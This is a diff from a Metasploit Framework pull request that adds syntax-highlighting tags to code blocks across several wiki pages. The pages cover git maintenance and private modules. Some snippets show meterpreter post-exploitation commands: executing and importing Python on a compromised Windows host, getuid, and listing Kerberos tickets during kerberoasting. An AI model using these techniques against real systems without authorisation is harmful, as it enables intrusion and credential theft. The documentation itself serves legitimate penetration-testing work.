-```
+```msf
 meterpreter > python_execute "x = x + 1"
 [-] Content written to stderr:
 Traceback (most recent call last):
@@ -66,25 +66,25 @@ NameError: name 'x' is not defined
 This handy feature now only allows users to see the output of their scripts, but it also means that any errors are completely visible too.
 
 A more interesting example can be seen below:
-```
+```msf
 meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]"
 [+] Command executed without returning a result
 ```
 The command above executes, but nothing was printed to stdout, or to stderr, and hence nothing was captured.
 
 The good thing is that the Python extension is persistant across calls. This means that after the above command is executed, `x` is still present in the interpreter and can be accessed with another call:
-```
+```msf
 meterpreter > python_execute "print x"
 [+] Content written to stdout:
 [0, 5, 10, 15]
 ```
 As useful as this is, developers may want to produce post-modules that make use of the data that a Python script has generated. Parsing stdout is not ideal in such a scenario, and hence this command provides the means for individual variables to be extracted directly using the `-r` paramter, as described by the help:
-```
+```msf
 meterpreter > python_execute "x = [y for y in range(0, 20) if y % 5 == 0]" -r x
 [+] x = [0, 5, 10, 15]
 ```
 Note that this command requires the first parameter to be a string that contains code that needs to be executed. However, this string can be blank, resulting in no code being executed. This means that extraction of content generated in previous calls is still possible without executing more code, or rerunning previous code snippets just to make use of the `-r` parameter:
-```
+```msf
 meterpreter > python_execute "" -r x
 [+] x = [0, 5, 10, 15]
 ```
@@ -95,7 +95,7 @@ Sometimes, single-line execution isn't enough, or is cumbersome. The `python_imp
 ## python_import
 
 This command allows for whole modules to be loaded from the attacker's machine an uploaded to the target interpreter. The full help is shown below:
-```
+```msf
 meterpreter > python_import -h
 Usage: python_import <-f file path> [-n mod name] [-r result var name]
 
@@ -114,8 +114,8 @@ OPTIONS:
 Importing of module trees is still considered a _beta_ feature, but we encourage you to use it where possible and keep us informed of any issues you may face.
 
 Consider the following script:
-```
-$ cat /tmp/drives.py
+```python
+# $ cat /tmp/drives.py
 import string
 from ctypes import windll
 
@@ -133,7 +133,7 @@ result = get_drives()
 print result
 ```
 The aim of this is to determine all the local logical drives and put the letters into a list. From there it prints that list to screen. The result of running the script is as follows:
-```
+```msf
 meterpreter > python_import -f /tmp/drives.py
 [*] Importing /tmp/drives.py ...
 [+] Content written to stdout:
@@ -146,7 +146,7 @@ This command is also intended to allow for recursive loading of modules from the
 ## python_reset
 
 It may get to a point where the content of the interpreter needs to be flushed. The `python_reset` command clears out all imports, libraries and global variables:
-```
+```msf
 meterpreter > python_execute "x = 100"
 [+] Command executed without returning a result
 meterpreter > python_execute "print x"
@@ -244,7 +244,7 @@ It is not possible to delete transports using the python extension as this opens
 
 ### Bindings example
 
-```
+```msf
 meterpreter > getuid
 Server username: WIN-TV01I7GG7JK\oj
 meterpreter > python_execute "import meterpreter.user; print meterpreter.user.getuid()"

--- a/docs/metasploit-framework.wiki/Remote-Branch-Pruning.md
+++ b/docs/metasploit-framework.wiki/Remote-Branch-Pruning.md
@@ -8,18 +8,18 @@ Clone a new metasploit-framework.git repository:
 
 Go there and check out every remote branch we've got. That way, if you screw up and delete something important, you can add it back in later from this backup clone.
 
-````
+```
 todb@presto:~/github/todb-r7$ cd msf-backup.git
 `todb@presto:~/github/todb-r7/metasploit-framework$ for b in `git branch -r | grep -v "HEAD -> origin" | sed 's/^  origin\///'`; do git checkout -b $b --track origin/$b; done
-````
+```
 
 Tarball it out of the way.
 
-````
+```
 todb@presto:~/github/todb-r7$ cd ..
 todb@presto:~/github$ tar zxvf msf-backup.git.tar.gz
 todb@presto:~/github$ rm -rf msf-backup.git
-````
+```
 
 # Make a new clone
 
@@ -35,10 +35,10 @@ First, wipe out anything that responds to prune. Usually that's not a lot.
 
 Next, take a look at what's already merged and what's not. We can drop most of the merged stuff right away.
 
-````
+```
 mazikeen:./msf-prune$ git branch -r --merged 
 mazikeen:./msf-prune$ git branch -r --no-merged 
-````
+```
 
 That gives a pretty good idea of how many branches we're talking about.
 
@@ -46,21 +46,21 @@ That gives a pretty good idea of how many branches we're talking about.
 
 Here's a one-liner, lightly modified from http://stackoverflow.com/questions/2514172/listing-each-branch-and-its-last-revisions-date-in-git#2514279 which lists all remote **merged** branches in date order.
 
-````
+```
 mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort
-````
+```
 
 Count off how many you want to keep at the end, do the arithmetic, and tack on another couple pipes to catch everything that's more than two weeks old. These are the merged branches that nobody's likely to miss.
 
-`````
+```
 mazikeen:./msf-prune$ for k in `git branch -r --merged |grep -v "HEAD ->" | sed s/^..//`; do echo -e `git log -1 --pretty=format:"%Cgreen%ci %Cblue%cr%Creset" $k --`\\t"$k";done | sort | head -45 | sed "s/^.*origin\///" > /tmp/merged_to_delete.txt
-````
+```
 
 Pull the trigger:
 
-````
+```
 mazikeen:./msf-prune$ for b in `cat /tmp/merged_to_delete.txt`; do echo Deleting $b && git push origin :$b; done
-````
+```
 
 Note that we still have our tarball, so if we need to reinstate any of these branches, just need to re-push.
 

--- a/docs/metasploit-framework.wiki/Rolling-back-merges.md
+++ b/docs/metasploit-framework.wiki/Rolling-back-merges.md
@@ -31,14 +31,14 @@ You can inspect exactly what commits are contained in this merge with the follow
 
 Like so:
 
-````
+```
 $ git log bad-merge...bad-merge~ --oneline
 3996557 Fix conflcit lib/msf/util/exe.rb
 6296c4f Merge pull request #9 from tabassassin/retab/pr/2320
 d0a3ea6 Retab changes for PR #2320
 bff7d0e Merge for retab
 4c9e6a8 Default to exe-small
-````
+```
 
 The syntax is a little wacky, but this is saying, "Show me all the commit hashes that occur from the `bad-merge` point to one back from `bad-merge` (in other words, from right before `bad-merge` was merged). That's what the tilde (~) means. You could also use `bad-merge^` or `bad-merge^1`, they're all equivalent.
 

--- a/docs/metasploit-framework.wiki/Running-Private-Modules.md
+++ b/docs/metasploit-framework.wiki/Running-Private-Modules.md
@@ -4,9 +4,9 @@ If you're in the business of writing or collecting Metasploit modules that aren'
 
 You must first set up a directory structure that fits with Metasploit's expectations of path names. What this typically means is that you should first create an "exploits" directory structure, like so:
 
-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits
-````
+```
 
 If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll want to `mkdir` those as well.
 
@@ -14,9 +14,9 @@ If you are using `auxiliary` or `post` modules, or are writing `payloads` you'll
 
 Modules are sorted by (somewhat arbitrary) categories. These can be anything you like; I usually use `test` or `private`, but if you are developing a module with an eye toward providing it to the main Metasploit distribution, you will want to mirror the real module path. For example:
 
-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits/windows/fileformat
-````
+```
 
 ... if you are developing a file format exploit for Windows.
 
@@ -36,7 +36,7 @@ For full details:
 
 If you already have msfconsole running, use a `reload_all` command to pick up your new modules. If not, just start msfconsole and they'll be picked up automatically. If you'd like to test with something generic, I have a module posted up as a gist, here: <https://gist.github.com/todb-r7/5935519>, so let's give it a shot:
 
-````bash
+```bash
 mkdir -p $HOME/.msf4/modules/exploits/test
 curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gist.github.com/todb-r7/5935519/raw/17f7e40ab9054051c1f7e0655c6f8c8a1787d4f5/test_module.rb
 todb@ubuntu:~$ mkdir -p $HOME/.msf4/modules/exploits/test
@@ -44,7 +44,7 @@ todb@ubuntu:~$ curl -Lo ~/.msf4/modules/exploits/test/test_module.rb https://gis
   % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                  Dload  Upload   Total   Spent    Left  Speed
 100  1140    0  1140    0     0   3607      0 --:--:-- --:--:-- --:--:--  7808
-````
+```
 
 Then, in my msfconsole window:
 

--- a/docs/metasploit-framework.wiki/dev/Setting-Up-a-Metasploit-Development-Environment.md
+++ b/docs/metasploit-framework.wiki/dev/Setting-Up-a-Metasploit-Development-Environment.md
@@ -176,7 +176,7 @@ git config commit.gpgsign true
 
 Developers tend to customize their own [git aliases] to speed up common commands, but here are a few common ones:
 
-```
+```ini
 [alias]
 # An easy, colored oneline log format that shows signed/unsigned status
 nicelog = log --pretty=format:'%Cred%h%Creset -%Creset %s %Cgreen(%cr) %C(bold blue)<%aE>%Creset [%G?]'

--- a/docs/metasploit-framework.wiki/git/Git-cheatsheet.md
+++ b/docs/metasploit-framework.wiki/git/Git-cheatsheet.md
@@ -110,8 +110,8 @@ your day-to-day workflow with Git.
 ## Git in Bash
 When using Git, it's very handy (read: pretty much mandatory) to have an ambient cue in your shell telling you what branch you're currently on.  Use this function in your .profile/.bashrc/.bash_profile to enable you to place your Git branch in your prompt:
 
-````
+```sh
 function parse_git_branch {
   git branch --no-color 2> /dev/null | sed -e '/^[^*]/d' -e 's/* \(.*\)/(\1)/'
 }
-````
+```

--- a/docs/metasploit-framework.wiki/git/Using-Git.md
+++ b/docs/metasploit-framework.wiki/git/Using-Git.md
@@ -12,7 +12,7 @@ A fork is when you snapshot someone else's codebase into your own repo, presumab
 
 You only fork once, you clone as many times as you have machines on which you want to code, and you branch, commit, and push as often as you like (you don't always have to push, you can push later or not at all, but you'll have to push before doing a pull request, a.k.a. PR), and you submit a PR when you are ready.  See below
 
-```
+```plaintext
 github.com/rapid7/metasploit-framework --> fork --> github.com/<...>/metasploit-framework
     ^                                                          |
     |                               git clone git://github.com/<...>/metasploit-framework.git

--- a/docs/metasploit-framework.wiki/kerberos/kerberoasting.md
+++ b/docs/metasploit-framework.wiki/kerberos/kerberoasting.md
@@ -198,8 +198,7 @@ Asking for: https/TSTWLPT1000000
 
 Tickets in the current session can be viewed like so:
 
-```
-
+```msf
 meterpreter > kerberos_ticket_list
 [+] Kerberos tickets found in the current session.
 [00000000] - 0x00000012 - aes256_hmac


### PR DESCRIPTION
## Before

Multiple code/console snippets missing syntax highlighting on the wiki:

<img width="1119" alt="image" src="https://github.com/rapid7/metasploit-framework/assets/60357436/9b2bc5c9-e3a4-458d-a7c9-4fd79fc7af54">

## After

Syntax highlighting added:

<img width="1105" alt="image" src="https://github.com/rapid7/metasploit-framework/assets/60357436/bb0137c3-1664-40e8-86a3-a53b18e9a372">

## Verification

- Verify CI passes